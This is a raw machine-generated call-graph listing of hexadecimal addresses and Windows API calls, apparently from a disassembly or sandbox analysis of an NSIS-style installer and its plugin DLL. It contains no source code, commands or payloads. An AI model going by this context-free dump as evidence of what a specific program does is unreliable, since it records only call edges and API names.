4032f9 ReadFile 4860->4861 4864 402f63 4861->4864 4862 402d1a 33 API calls 4862->4870 4865 402f9f CreateFileW 4863->4865 4864->4855 4864->4871 4866 402fd9 4865->4866 4865->4871 4947 40330f SetFilePointer 4866->4947 4868 402fe7 4869 403062 46 API calls 4868->4869 4869->4871 4870->4851 4870->4853 4870->4856 4870->4862 4870->4871 4871->4780 4873 406254 3 API calls 4872->4873 4874 4038c8 4873->4874 4875 4038e0 4874->4875 4876 4038ce 4874->4876 4877 405db7 3 API calls 4875->4877 4958 405e31 wsprintfW 4876->4958 4878 403910 4877->4878 4880 40392f lstrcatW 4878->4880 4882 405db7 3 API calls 4878->4882 4881 4038de 4880->4881 4949 403b8a 4881->4949 4882->4880 4885 405a3d 18 API calls 4886 403961 4885->4886 4887 4039f5 4886->4887 4889 405db7 3 API calls 4886->4889 4888 405a3d 18 API calls 4887->4888 4890 4039fb 4888->4890 4891 403993 4889->4891 4892 403a0b LoadImageW 4890->4892 4893 405f0c 18 API calls 4890->4893 4891->4887 4896 4039b4 lstrlenW 4891->4896 4900 405962 CharNextW 4891->4900 4894 403ab1 4892->4894 4895 403a32 RegisterClassW 4892->4895 4893->4892 4899 40140b 2 API calls 4894->4899 4897 403abb 4895->4897 4898 403a68 SystemParametersInfoW CreateWindowExW 4895->4898 4901 4039c2 lstrcmpiW 4896->4901 4902 4039e8 4896->4902 4897->4783 4898->4894 4903 403ab7 4899->4903 4904 4039b1 4900->4904 4901->4902 4905 4039d2 GetFileAttributesW 4901->4905 4906 405935 3 API calls 4902->4906 4903->4897 4908 403b8a 19 API calls 4903->4908 4904->4896 4907 4039de 4905->4907 4909 4039ee 4906->4909 4907->4902 4910 405981 2 API calls 4907->4910 4911 403ac8 4908->4911 4959 405eea lstrcpynW 4909->4959 4910->4902 4913 403ad4 ShowWindow LoadLibraryW 4911->4913 4914 403b57 4911->4914 4915 403af3 LoadLibraryW 4913->4915 4916 403afa GetClassInfoW 4913->4916 4960 405267 OleInitialize 4914->4960 4915->4916 4918 403b24 DialogBoxParamW 4916->4918 4919 403b0e GetClassInfoW RegisterClassW 4916->4919 4921 40140b 2 API calls 4918->4921 4919->4918 4920 403b5d 4922 403b61 4920->4922 4923 403b79 4920->4923 4921->4897 4922->4897 4925 40140b 2 API calls 4922->4925 4924 40140b 2 API calls 4923->4924 4924->4897 4925->4897 4926->4770 4927->4815 4928->4786 4930 4037d3 CloseHandle 4929->4930 4931 4037dd 4929->4931 4930->4931 4932 4037f1 4931->4932 4933 4037e7 CloseHandle 4931->4933 4968 40381f 4932->4968 4933->4932 4936 405772 71 API calls 4937 403621 OleUninitialize 4936->4937 4937->4792 4937->4793 4938->4807 4939->4829 4941 405b92 GetTickCount GetTempFileNameW 4940->4941 4942 403358 4941->4942 4943 405bc8 4941->4943 4942->4772 4943->4941 4943->4942 4944->4844 4945->4846 4946->4850 4947->4868 4948->4860 4950 403b9e 4949->4950 4967 405e31 wsprintfW 4950->4967 4952 403c0f 4953 405f0c 18 API calls 4952->4953 4954 403c1b SetWindowTextW 4953->4954 4955 40393f 4954->4955 4956 403c37 4954->4956 4955->4885 4956->4955 4957 405f0c 18 API calls 4956->4957 4957->4956 4958->4881 4959->4887 4961 40417b SendMessageW 4960->4961 4962 40528a 4961->4962 4965 401389 2 API calls 4962->4965 4966 4052b1 4962->4966 4963 40417b SendMessageW 4964 4052c3 OleUninitialize 4963->4964 4964->4920 4965->4962 4966->4963 4967->4952 4969 40382d 4968->4969 4970 4037f6 4969->4970 4971 403832 FreeLibrary GlobalFree 4969->4971 4970->4936 4971->4970 4971->4971 5272 40155b 5273 40296d 5272->5273 5276 405e31 wsprintfW 5273->5276 5275 402972 5276->5275 3906 4023e0 3917 402c44 3906->3917 3908 4023ea 3921 402b3a 3908->3921 3911 4023fe RegQueryValueExW 3912 402424 RegCloseKey 3911->3912 3913 40241e 3911->3913 3916 402793 3912->3916 3913->3912 3927 405e31 wsprintfW 3913->3927 3918 402b3a 18 API calls 3917->3918 3919 402c5d 3918->3919 3920 402c6b RegOpenKeyExW 3919->3920 3920->3908 3922 402b46 3921->3922 3928 405f0c 3922->3928 3925 4023f3 3925->3911 3925->3916 3927->3912 3929 405f19 3928->3929 3930 406164 3929->3930 3933 405fcc GetVersion 3929->3933 3934 406132 lstrlenW 3929->3934 3936 405f0c 10 API calls 3929->3936 3939 406047 GetSystemDirectoryW 3929->3939 3940 40605a GetWindowsDirectoryW 3929->3940 3941 40617e 5 API calls 3929->3941 3942 405f0c 10 API calls 3929->3942 3943 4060d3 lstrcatW 3929->3943 3944 40608e SHGetSpecialFolderLocation 3929->3944 3955 405db7 RegOpenKeyExW 3929->3955 3960 405e31 wsprintfW 3929->3960 3961 405eea lstrcpynW 3929->3961 3931 402b67 3930->3931 3962 405eea lstrcpynW 3930->3962 3931->3925 3946 40617e 3931->3946 3933->3929 3934->3929 3936->3934 3939->3929 3940->3929 3941->3929 3942->3929 3943->3929 3944->3929 3945 4060a6 SHGetPathFromIDListW CoTaskMemFree 3944->3945 3945->3929 3948 40618b 3946->3948 3947 406201 3949 406206 CharPrevW 3947->3949 3951 406227 3947->3951 3948->3947 3950 4061f4 CharNextW 3948->3950 3953 4061e0 CharNextW 3948->3953 3954 4061ef CharNextW 3948->3954 3963 405962 3948->3963 3949->3947 3950->3947 3950->3948 3951->3925 3953->3948 3954->3950 3956 405e2b 3955->3956 3957 405deb RegQueryValueExW 3955->3957 3956->3929 3958 405e0c RegCloseKey 3957->3958 3958->3956 3960->3929 3961->3929 3962->3931 3964 405968 3963->3964 3965 40597e 3964->3965 3966 40596f CharNextW 3964->3966 3965->3948 3966->3964 5284 401ce5 GetDlgItem GetClientRect 5285 402b3a 18 API calls 5284->5285 5286 401d17 LoadImageW SendMessageW 5285->5286 5287 401d35 DeleteObject 5286->5287 5288 4029c7 5286->5288 5287->5288 4189 40206a 4190 402b3a 18 API calls 4189->4190 4191 402071 4190->4191 4192 402b3a 18 API calls 4191->4192 4193 40207b 4192->4193 4194 402b3a 18 API calls 4193->4194 4195 402084 4194->4195 4196 402b3a 18 API calls 4195->4196 4197 40208e 4196->4197 4198 402b3a 18 API calls 4197->4198 4199 402098 4198->4199 4200 4020ac CoCreateInstance 4199->4200 4201 402b3a 18 API calls 4199->4201 4204 4020cb 4200->4204 4201->4200 4203 402197 4204->4203 4205 401423 4204->4205 4206 405194 25 API calls 4205->4206 4207 401431 4206->4207 4207->4203 5289 40156b 5290 401584 5289->5290 5291 40157b ShowWindow 5289->5291 5292 401592 ShowWindow 5290->5292 5293 4029c7 5290->5293 5291->5290 5292->5293 5294 4024ee 5295 4024f3 5294->5295 5296 40250c 5294->5296 5297 402b1d 18 API calls 5295->5297 5298 402512 5296->5298 5299 40253e 5296->5299 5302 4024fa 5297->5302 5300 402b3a 18 API calls 5298->5300 5301 402b3a 18 API calls 5299->5301 5303 402519 WideCharToMultiByte lstrlenA 5300->5303 5304 402545 lstrlenW 5301->5304 5305 402567 WriteFile 5302->5305 5306 402793 5302->5306 5303->5302 5304->5302 5305->5306 5307 4018ef 5308 401926 5307->5308 5309 402b3a 18 API calls 5308->5309 5310 40192b 5309->5310 5311 405772 71 API calls 5310->5311 5312 401934 5311->5312 5313 402770 5314 402b3a 18 API calls 5313->5314 5315 402777 FindFirstFileW 5314->5315 5316 40278a 5315->5316 5317 40279f 5315->5317 5318 4027a8 5317->5318 5321 405e31 wsprintfW 5317->5321 5322 405eea lstrcpynW 5318->5322 5321->5318 5322->5316 5323 4014f1 SetForegroundWindow 5324 4029c7 5323->5324 5325 403872 5326 40387d 5325->5326 5327 403881 5326->5327 5328 403884 GlobalAlloc 5326->5328 5328->5327 5329 4018f2 5330 402b3a 18 API calls 5329->5330 5331 4018f9 5330->5331 5332 4056c6 MessageBoxIndirectW 5331->5332 5333 401902 5332->5333 4446 402573 4447 402b1d 18 API calls 4446->4447 4449 402582 4447->4449 4448 4026a0 4449->4448 4450 4025c8 ReadFile 4449->4450 4451 405bd9 ReadFile 4449->4451 4452 4026a2 4449->4452 4453 402608 MultiByteToWideChar 4449->4453 4455 40262e SetFilePointer MultiByteToWideChar 4449->4455 4456 4026b3 4449->4456 4450->4448 4450->4449 4451->4449 4458 405e31 wsprintfW 4452->4458 4453->4449 4455->4449 4456->4448 4457 4026d4 SetFilePointer 4456->4457 4457->4448 4458->4448 5334 401df3 5335 402b3a 18 API calls 5334->5335 5336 401df9 5335->5336 5337 402b3a 18 API calls 5336->5337 5338 401e02 5337->5338 5339 402b3a 18 API calls 5338->5339 5340 401e0b 5339->5340 5341 402b3a 18 API calls 5340->5341 5342 401e14 5341->5342 5343 401423 25 API calls 5342->5343 5344 401e1b ShellExecuteW 5343->5344 5345 401e4c 5344->5345 4731 4026f9 4732 402700 4731->4732 4735 402972 4731->4735 4733 402b1d 18 API calls 4732->4733 4734 40270b 4733->4734 4736 402712 SetFilePointer 4734->4736 4736->4735 4737 402722 4736->4737 4739 405e31 wsprintfW 4737->4739 4739->4735 5372 40427d lstrlenW 5373 40429c 5372->5373 5374 40429e WideCharToMultiByte 5372->5374 5373->5374 5375 1000103d 5376 1000101b 7 API calls 5375->5376 5377 10001056 5376->5377 5378 402c7f 5379 402c91 SetTimer 5378->5379 5380 402caa 5378->5380 5379->5380 5381 402cf8 5380->5381 5382 402cfe MulDiv 5380->5382 5383 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5382->5383 5383->5381 5385 4014ff 5386 401507 5385->5386 5388 40151a 5385->5388 5387 402b1d 18 API calls 5386->5387 5387->5388 5389 401000 5390 401037 BeginPaint GetClientRect 5389->5390 5393 40100c DefWindowProcW 5389->5393 5391 4010f3 5390->5391 5395 401073 CreateBrushIndirect FillRect DeleteObject 5391->5395 5396 4010fc 5391->5396 5394 401179 5393->5394 5395->5391 5397 401102 CreateFontIndirectW 5396->5397 5398 401167 EndPaint 5396->5398 5397->5398 5399 401112 6 API calls 5397->5399 5398->5394 5399->5398 5400 401a00 5401 402b3a 18 API calls 5400->5401 5402 401a09 ExpandEnvironmentStringsW 5401->5402 5403 401a30 5402->5403 5404 401a1d 5402->5404 5404->5403 5405 401a22 lstrcmpW 5404->5405 5405->5403 5406 401b01 5407 402b3a 18 API calls 5406->5407 5408 401b08 5407->5408 5409 402b1d 18 API calls 5408->5409 5410 401b11 wsprintfW 5409->5410 5411 4029c7 5410->5411 5412 100018c1 5413 10001243 3 API calls 5412->5413 5414 100018e7 5413->5414 5415 10001243 3 API calls 5414->5415 5416 100018ef 5415->5416 5417 10001243 3 API calls 5416->5417 5419 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5416->5419 5418 10001916 5417->5418 5420 1000191f GlobalFree 5418->5420 5421 10001280 2 API calls 5419->5421 5420->5419 5422 10001aad GlobalFree GlobalFree 5421->5422 5423 10002a43 5424 10002a5b 5423->5424 5425 100015a7 2 API calls 5424->5425 5426 10002a76 5425->5426 5427 404583 5428 404593 5427->5428 5429 4045b9 5427->5429 5430 40412f 19 API calls 5428->5430 5431 404196 8 API calls 5429->5431 5432 4045a0 SetDlgItemTextW 5430->5432 5433 4045c5 5431->5433 5432->5429 4148 405108 4149 405118 4148->4149 4150 40512c 4148->4150 4151 40511e 4149->4151 4161 405175 4149->4161 4152 405134 IsWindowVisible 4150->4152 4159 405154 4150->4159 4162 40417b 4151->4162 4154 405141 4152->4154 4152->4161 4165 404a5e SendMessageW 4154->4165 4155 40517a CallWindowProcW 4156 405128 4155->4156 4159->4155 4170 404ade 4159->4170 4161->4155 4163 404193 4162->4163 4164 404184 SendMessageW 4162->4164 4163->4156 4164->4163 4166 404a81 GetMessagePos ScreenToClient SendMessageW 4165->4166 4167 404abd SendMessageW 4165->4167 4168 404ab5 4166->4168 4169 404aba 4166->4169 4167->4168 4168->4159 4169->4167 4179 405eea lstrcpynW 4170->4179 4172 404af1 4180 405e31 wsprintfW 4172->4180 4174 404afb 4181 40140b 4174->4181 4178 404b0b 4178->4161 4179->4172 4180->4174 4185 401389 4181->4185 4184 405eea lstrcpynW 4184->4178 4187 401390 4185->4187 4186 4013fe 4186->4184 4187->4186 4188 4013cb MulDiv SendMessageW 4187->4188 4188->4187 5434 401f08 5435 402b3a 18 API calls 5434->5435 5436 401f0f GetFileVersionInfoSizeW 5435->5436 5437 401f36 GlobalAlloc 5436->5437 5438 401f8c 5436->5438 5437->5438 5439 401f4a GetFileVersionInfoW 5437->5439 5439->5438 5440 401f59 VerQueryValueW 5439->5440 5440->5438 5441 401f72 5440->5441 5445 405e31 wsprintfW 5441->5445 5443 401f7e 5446 405e31 wsprintfW 5443->5446 5445->5443 5446->5438 5454 1000224c 5455 100022b1 5454->5455 5456 100022e7 5454->5456 5455->5456 5457 100022c3 GlobalAlloc 5455->5457 5457->5455 5458 100016ce 5459 100016fd 5458->5459 5460 10001b3e 24 API calls 5459->5460 5461 10001704 5460->5461 5462 10001717 5461->5462 5463 1000170b 5461->5463 5465 10001721 5462->5465 5466 1000173e 5462->5466 5464 10001280 2 API calls 5463->5464 5469 10001715 5464->5469 5470 10001555 2 API calls 5465->5470 5467 10001744 5466->5467 5468 10001768 5466->5468 5471 100015cc 2 API calls 5467->5471 5472 10001555 2 API calls 5468->5472 5473 10001726 5470->5473 5475 10001749 5471->5475 5472->5469 5474 100015cc 2 API calls 5473->5474 5476 1000172c 5474->5476 5477 10001280 2 API calls 5475->5477 5478 10001280 2 API calls 5476->5478 5479 1000174f GlobalFree 5477->5479 5480 10001732 GlobalFree 5478->5480 5479->5469 5481 10001763 GlobalFree 5479->5481 5480->5469 5481->5469 4211 404b10 GetDlgItem GetDlgItem 4212 404b62 7 API calls 4211->4212 4221 404d7b 4211->4221 4213 404c05 DeleteObject 4212->4213 4214 404bf8 SendMessageW 4212->4214 4215 404c0e 4213->4215 4214->4213 4216 404c1d 4215->4216 4217 404c45 4215->4217 4219 405f0c 18 API calls 4216->4219 4267 40412f 4217->4267 4218 404f0b 4225 404f15 SendMessageW 4218->4225 4232 404f1d 4218->4232 4226 404c27 SendMessageW SendMessageW 4219->4226 4220 404e40 4224 404e5f 4220->4224 4231 404e51 SendMessageW 4220->4231 4221->4220 4221->4224 4227 404ddb 4221->4227 4223 4050f3 4280 404196 4223->4280 4224->4218 4224->4223 4229 404eb8 SendMessageW 4224->4229 4225->4232 4226->4215 4233 404a5e 5 API calls 4227->4233 4228 404c59 4234 40412f 19 API calls 4228->4234 4229->4223 4236 404ecd SendMessageW 4229->4236 4231->4224 4238 404f36 4232->4238 4239 404f2f ImageList_Destroy 4232->4239 4243 404f46 4232->4243 4246 404dec 4233->4246 4247 404c67 4234->4247 4235 4050b5 4235->4223 4244 4050c7 ShowWindow GetDlgItem ShowWindow 4235->4244 4241 404ee0 4236->4241 4242 404f3f GlobalFree 4238->4242 4238->4243 4239->4238 4240 404d3c GetWindowLongW SetWindowLongW 4245 404d55 4240->4245 4252 404ef1 SendMessageW 4241->4252 4242->4243 4243->4235 4257 404ade 4 API calls 4243->4257 4261 404f81 4243->4261 4244->4223 4248 404d73 4245->4248 4249 404d5b ShowWindow 4245->4249 4246->4220 4247->4240 4251 404cb7 SendMessageW 4247->4251 4253 404d36 4247->4253 4255 404cf3 SendMessageW 4247->4255 4256 404d04 SendMessageW 4247->4256 4271 404164 SendMessageW 4248->4271 4270 404164 SendMessageW 4249->4270 4251->4247 4252->4218 4253->4240 4253->4245 4255->4247 4256->4247 4257->4261 4258 404d6e 4258->4223 4259 40508b InvalidateRect 4259->4235 4260 4050a1 4259->4260 4272 404978 4260->4272 4262 404faf SendMessageW 4261->4262 4263 404fc5 4261->4263 4262->4263 4263->4259 4265 405026 4263->4265 4266 405039 SendMessageW SendMessageW 4263->4266 4265->4266 4266->4263 4268 405f0c 18 API calls 4267->4268 4269 40413a SetDlgItemTextW 4268->4269 4269->4228 4270->4258 4271->4221 4273 404995 4272->4273 4274 405f0c 18 API calls 4273->4274 4275 4049ca 4274->4275 4276 405f0c 18 API calls 4275->4276 4277 4049d5 4276->4277 4278 405f0c 18 API calls 4277->4278 4279 404a06 lstrlenW wsprintfW SetDlgItemTextW 4278->4279 4279->4235 4281 404237 4280->4281 4282 4041ae GetWindowLongW 4280->4282 4282->4281 4283 4041bf 4282->4283 4284 4041d1 4283->4284 4285 4041ce GetSysColor 4283->4285 4286 4041e1 SetBkMode 4284->4286 4287 4041d7 SetTextColor 4284->4287 4285->4284 4288 4041f9 GetSysColor 4286->4288 4289 4041ff 4286->4289 4287->4286 4288->4289 4290 404210 4289->4290 4291 404206 SetBkColor 4289->4291 4290->4281 4292 404223 DeleteObject 4290->4292 4293 40422a CreateBrushIndirect 4290->4293 4291->4290 4292->4293 4293->4281 5482 401491 5483 405194 25 API calls 5482->5483 5484 401498 5483->5484 5485 404912 5486 404922 5485->5486 5487 40493e 5485->5487 5496 4056aa GetDlgItemTextW 5486->5496 5489 404971 5487->5489 5490 404944 SHGetPathFromIDListW 5487->5490 5492 40495b SendMessageW 5490->5492 5493 404954 5490->5493 5491 40492f SendMessageW 5491->5487 5492->5489 5494 40140b 2 API calls 5493->5494 5494->5492 5496->5491 5497 402295 5498 402b3a 18 API calls 5497->5498 5499 4022a4 5498->5499 5500 402b3a 18 API calls 5499->5500 5501 4022ad 5500->5501 5502 402b3a 18 API calls 5501->5502 5503 4022b7 GetPrivateProfileStringW 5502->5503 4536 401718 4537 402b3a 18 API calls 4536->4537 4538 40171f SearchPathW 4537->4538 4539 40173a 4538->4539 4540 401f98 4541 40205c 4540->4541 4542 401faa 4540->4542 4545 401423 25 API calls 4541->4545 4543 402b3a 18 API calls 4542->4543 4544 401fb1 4543->4544 4546 402b3a 18 API calls 4544->4546 4547 402197 4545->4547 4548 401fba 4546->4548 4549 401fd0 LoadLibraryExW 4548->4549 4550 401fc2 GetModuleHandleW 4548->4550 4549->4541 4551 401fe1 4549->4551 4550->4549 4550->4551 4563 4062c0 WideCharToMultiByte 4551->4563 4554 401ff2 4556 402011 4554->4556 4557 401ffa 4554->4557 4555 40202b 4558 405194 25 API calls 4555->4558 4566 10001771 4556->4566 4559 401423 25 API calls 4557->4559 4560 402002 4558->4560 4559->4560 4560->4547 4561 40204e FreeLibrary 4560->4561 4561->4547 4564 4062ea GetProcAddress 4563->4564 4565 401fec 4563->4565 4564->4565 4565->4554 4565->4555 4567 100017a1 4566->4567 4608 10001b3e 4567->4608 4569 100017a8 4570 100018be 4569->4570 4571 100017c0 4569->4571 4572 100017b9 4569->4572 4570->4560 4642 100022eb 4571->4642 4660 100022a1 4572->4660 4577 10001824 4581 10001866 4577->4581 4582 1000182a 4577->4582 4578 10001806 4673 1000248d 4578->4673 4579 100017d6 4584 100017dc 4579->4584 4589 100017e7 4579->4589 4580 100017ef 4593 100017e5 4580->4593 4670 10002b23 4580->4670 4587 1000248d 9 API calls 4581->4587 4585 100015cc 2 API calls 4582->4585 4584->4593 4654 10002868 4584->4654 4592 10001840 4585->4592 4594 10001858 4587->4594 4664 1000260b 4589->4664 4597 1000248d 9 API calls 4592->4597 4593->4577 4593->4578 4599 100018ad 4594->4599 4692 10002450 4594->4692 4596 100017ed 4596->4593 4597->4594 4599->4570 4601 100018b7 GlobalFree 4599->4601 4601->4570 4605 10001899 4605->4599 4696 10001555 4605->4696 4607 10001892 FreeLibrary 4607->4605 4700 1000121b GlobalAlloc 4608->4700 4610 10001b62 4701 1000121b GlobalAlloc 4610->4701 4612 10001b6d 4702 10001243 4612->4702 4614 10001da0 GlobalFree GlobalFree GlobalFree 4615 10001dbd 4614->4615 4629 10001e07 4614->4629 4617 1000210d 4615->4617 4623 10001dd2 4615->4623 4615->4629 4616 10001c43 GlobalAlloc 4639 10001b75 4616->4639 4618 1000212f GetModuleHandleW 4617->4618 4617->4629 4621 10002140 LoadLibraryW 4618->4621 4622 10002155 4618->4622 4619 10001c8e lstrcpyW 4624 10001c98 lstrcpyW 4619->4624 4620 10001cac GlobalFree 4620->4639 4621->4622 4621->4629 4713 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4622->4713 4623->4629 4709 1000122c 4623->4709 4624->4639 4626 100021a7 4627 100021b4 lstrlenW 4626->4627 4626->4629 4714 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4627->4714 4629->4569 4630 10002167 4630->4626 4641 10002191 GetProcAddress 4630->4641 4632 10002067 4632->4629 4637 100020af lstrcpyW 4632->4637 4634 10001cea 4634->4639 4707 100015a7 GlobalSize GlobalAlloc 4634->4707 4635 10001f56 GlobalFree 4635->4639 4636 100021ce 4636->4629 4637->4629 4639->4614 4639->4616 4639->4619 4639->4620 4639->4624 4639->4629 4639->4632 4639->4634 4639->4635 4640 1000122c 2 API calls 4639->4640 4712 1000121b GlobalAlloc 4639->4712 4640->4639 4641->4626 4649 10002303 4642->4649 4643 1000122c GlobalAlloc lstrcpynW 4643->4649 4644 10001243 3 API calls 4644->4649 4646 10002419 GlobalFree 4647 100017c6 4646->4647 4646->4649 4647->4579 4647->4580 4647->4593 4648 100023d5 GlobalAlloc WideCharToMultiByte 4648->4646 4649->4643 4649->4644 4649->4646 4649->4648 4650 100023ae GlobalAlloc CLSIDFromString 4649->4650 4651 10002390 lstrlenW 4649->4651 4717 100012c8 4649->4717 4650->4646 4651->4646 4653 1000239b 4651->4653 4653->4646 4722 1000259f 4653->4722 4656 1000287a 4654->4656 4655 1000291f EnumWindows 4657 1000293d 4655->4657 4656->4655 4658 10002a39 4657->4658 4659 10002a2e GetLastError 4657->4659 4658->4593 4659->4658 4661 100022b1 4660->4661 4663 100017bf 4660->4663 4662 100022c3 GlobalAlloc 4661->4662 4661->4663 4662->4661 4663->4571 4668 10002627 4664->4668 4665 10002678 GlobalAlloc 4669 1000269a 4665->4669 4666 1000268b 4667 10002690 GlobalSize 4666->4667 4666->4669 4667->4669 4668->4665 4668->4666 4669->4596 4671 10002b2e 4670->4671 4672 10002b6e GlobalFree 4671->4672 4676 100024ad 4673->4676 4675 10002581 GlobalFree 4675->4676 4679 1000180c 4675->4679 4676->4675 4677 1000250e MultiByteToWideChar 4676->4677 4678 10002558 GlobalFree 4676->4678 4680 100024fd lstrcpynW 4676->4680 4681 100024ec StringFromGUID2 4676->4681 4682 10001280 2 API calls 4676->4682 4725 1000121b GlobalAlloc 4676->4725 4726 100012f3 4676->4726 4677->4676 4678->4676 4684 100015cc 4679->4684 4680->4676 4681->4676 4682->4676 4730 1000121b GlobalAlloc 4684->4730 4686 100015d2 4687 100015e4 lstrcpyW 4686->4687 4688 100015f9 4686->4688 4687->4688 4689 10001280 4688->4689 4690 100012c3 GlobalFree 4689->4690 4691 10001289 GlobalAlloc lstrcpynW 4689->4691 4690->4594 4691->4690 4693 1000245e 4692->4693 4695 10001879 4692->4695 4694 1000247a GlobalFree 4693->4694 4693->4695 4694->4693 4695->4605 4695->4607 4697 1000156d 4696->4697 4698 10001280 2 API calls 4697->4698 4699 10001576 4698->4699 4699->4599 4700->4610 4701->4612 4703 1000127c 4702->4703 4704 1000124d 4702->4704 4703->4639 4704->4703 4715 1000121b GlobalAlloc 4704->4715 4706 10001259 lstrcpyW GlobalFree 4706->4639 4708 100015c5 4707->4708 4708->4634 4716 1000121b GlobalAlloc 4709->4716 4711 1000123b lstrcpynW 4711->4629 4712->4639 4713->4630 4714->4636 4715->4706 4716->4711 4718 100012ee 4717->4718 4719 100012d0 4717->4719 4718->4718 4719->4718 4720 1000122c 2 API calls 4719->4720 4721 100012ec 4720->4721 4721->4649 4723 10002603 4722->4723 4724 100025ad VirtualAlloc 4722->4724 4723->4653 4724->4723 4725->4676 4727 10001324 4726->4727 4728 100012fc 4726->4728 4727->4676 4728->4727 4729 10001308 lstrcpyW 4728->4729 4729->4727 4730->4686 5504 10001058 5505 10001243 3 API calls 5504->5505 5507 10001074 5505->5507 5506 100010dd 5507->5506 5508 1000152e 4 API calls 5507->5508 5509 10001092 5507->5509 5508->5509 5510 1000152e 4 API calls 5509->5510 5511 100010a2 5510->5511 5512 100010b2 5511->5512 5513 100010a9 GlobalSize 5511->5513 5514 100010b6 GlobalAlloc 5512->5514 5515 100010c7 5512->5515 5513->5512 5516 10001555 2 API calls 5514->5516 5517 100010d2 GlobalFree 5515->5517 5516->5515 5517->5506 5518 40159b 5519 402b3a 18 API calls 5518->5519 5520 4015a2 SetFileAttributesW 5519->5520 5521 4015b4 5520->5521 5522 40149e 5523 4014ac PostQuitMessage 5522->5523 5524 40223e 5522->5524 5523->5524 5525 4021a0 5526 402b3a 18 API calls 5525->5526 5527 4021a6 5526->5527 5528 402b3a 18 API calls 5527->5528 5529 4021af 5528->5529 5530 402b3a 18 API calls 5529->5530 5531 4021b8 5530->5531 5532 40622d 2 API calls 5531->5532 5533 4021c1 5532->5533 5534 4021d2 lstrlenW lstrlenW 5533->5534 5535 4021c5 5533->5535 5537 405194 25 API calls 5534->5537 5536 405194 25 API calls 5535->5536 5539 4021cd 5535->5539 5536->5539 5538 402210 SHFileOperationW 5537->5538 5538->5535 5538->5539 5540 100010e1 5541 10001111 5540->5541 5542 10001243 3 API calls 5541->5542 5552 10001121 5542->5552 5543 100011d8 GlobalFree 5544 100012c8 2 API calls 5544->5552 5545 100011d3 5545->5543 5546 10001243 3 API calls 5546->5552 5547 10001280 2 API calls 5550 100011c4 GlobalFree 5547->5550 5548 10001164 GlobalAlloc 5548->5552 5549 100011f8 GlobalFree 5549->5552 5550->5552 5551 100012f3 lstrcpyW 5551->5552 5552->5543 5552->5544 5552->5545 5552->5546 5552->5547 5552->5548 5552->5549 5552->5550 5552->5551 3967 401b22 3968 401b73 3967->3968 3969 401b2f 3967->3969 3971 401b78 3968->3971 3972 401b9d GlobalAlloc 3968->3972 3970 401bb8 3969->3970 3975 401b46 3969->3975 3974 405f0c 18 API calls 3970->3974 3983 40223e 3970->3983 3971->3983 3988 405eea lstrcpynW 3971->3988 3973 405f0c 18 API calls 3972->3973 3973->3970 3976 402238 3974->3976 3986 405eea lstrcpynW 3975->3986 3989 4056c6 3976->3989 3979 401b8a GlobalFree 3979->3983 3980 401b55 3987 405eea lstrcpynW 3980->3987 3984 401b64 3993 405eea lstrcpynW 3984->3993 3986->3980 3987->3984 3988->3979 3990 4056db 3989->3990 3991 405727 3990->3991 3992 4056ef MessageBoxIndirectW 3990->3992 3991->3983 3992->3991 3993->3983 5553 4029a2 SendMessageW 5554 4029c7 5553->5554 5555 4029bc InvalidateRect 5553->5555 5555->5554 3994 401924 3995 401926 3994->3995 3996 402b3a 18 API calls 3995->3996 3997 40192b 3996->3997 4000 405772 3997->4000 4039 405a3d 4000->4039 4003 4057b1 4010 4058d1 4003->4010 4053 405eea lstrcpynW 4003->4053 4004 40579a DeleteFileW 4005 401934 4004->4005 4007 4057d7 4008 4057ea 4007->4008 4009 4057dd lstrcatW 4007->4009 4054 405981 lstrlenW 4008->4054 4011 4057f0 4009->4011 4010->4005 4083 40622d FindFirstFileW 4010->4083 4015 405800 lstrcatW 4011->4015 4017 40580b lstrlenW FindFirstFileW 4011->4017 4015->4017 4016 4058fa 4086 405935 lstrlenW CharPrevW 4016->4086 4017->4010 4024 40582d 4017->4024 4020 4058b4 FindNextFileW 4020->4024 4025 4058ca FindClose 4020->4025 4021 40572a 5 API calls 4023 40590c 4021->4023 4026 405910 4023->4026 4027 405926 4023->4027 4024->4020 4035 405875 4024->4035 4058 405eea lstrcpynW 4024->4058 4025->4010 4026->4005 4030 405194 25 API calls 4026->4030 4029 405194 25 API calls 4027->4029 4029->4005 4032 40591d 4030->4032 4031 405772 64 API calls 4031->4035 4034 405d84 40 API calls 4032->4034 4033 405194 25 API calls 4033->4020 4037 405924 4034->4037 4035->4020 4035->4031 4035->4033 4059 40572a 4035->4059 4067 405194 4035->4067 4078 405d84 4035->4078 4037->4005 4089 405eea lstrcpynW 4039->4089 4041 405a4e 4090 4059e0 CharNextW CharNextW 4041->4090 4044 405792 4044->4003 4044->4004 4045 40617e 5 API calls 4051 405a64 4045->4051 4046 405a95 lstrlenW 4047 405aa0 4046->4047 4046->4051 4049 405935 3 API calls 4047->4049 4048 40622d 2 API calls 4048->4051 4050 405aa5 GetFileAttributesW 4049->4050 4050->4044 4051->4044 4051->4046 4051->4048 4052 405981 2 API calls 4051->4052 4052->4046 4053->4007 4055 40598f 4054->4055 4056 4059a1 4055->4056 4057 405995 CharPrevW 4055->4057 4056->4011 4057->4055 4057->4056 4058->4024 4096 405b31 GetFileAttributesW 4059->4096 4062 405745 RemoveDirectoryW 4064 405753 4062->4064 4063 40574d DeleteFileW 4063->4064 4065 405757 4064->4065 4066 405763 SetFileAttributesW 4064->4066 4065->4035 4066->4065 4068 405251 4067->4068 4069 4051af 4067->4069 4068->4035 4070 4051cb lstrlenW 4069->4070 4071 405f0c 18 API calls 4069->4071 4072 4051f4 4070->4072 4073 4051d9 lstrlenW 4070->4073 4071->4070 4074 405207 4072->4074 4075 4051fa SetWindowTextW 4072->4075 4073->4068 4076 4051eb lstrcatW 4073->4076 4074->4068 4077 40520d SendMessageW SendMessageW SendMessageW 4074->4077 4075->4074 4076->4072 4077->4068 4099 406254 GetModuleHandleA 4078->4099 4082 405dac 4082->4035 4084 406243 FindClose 4083->4084 4085 4058f6 4083->4085 4084->4085 4085->4005 4085->4016 4087 405951 lstrcatW 4086->4087 4088 405900 4086->4088 4087->4088 4088->4021 4089->4041 4091 4059fd 4090->4091 4094 405a0f 4090->4094 4093 405a0a CharNextW 4091->4093 4091->4094 4092 405a33 4092->4044 4092->4045 4093->4092 4094->4092 4095 405962 CharNextW 4094->4095 4095->4094 4097 405736 4096->4097 4098 405b43 SetFileAttributesW 4096->4098 4097->4062 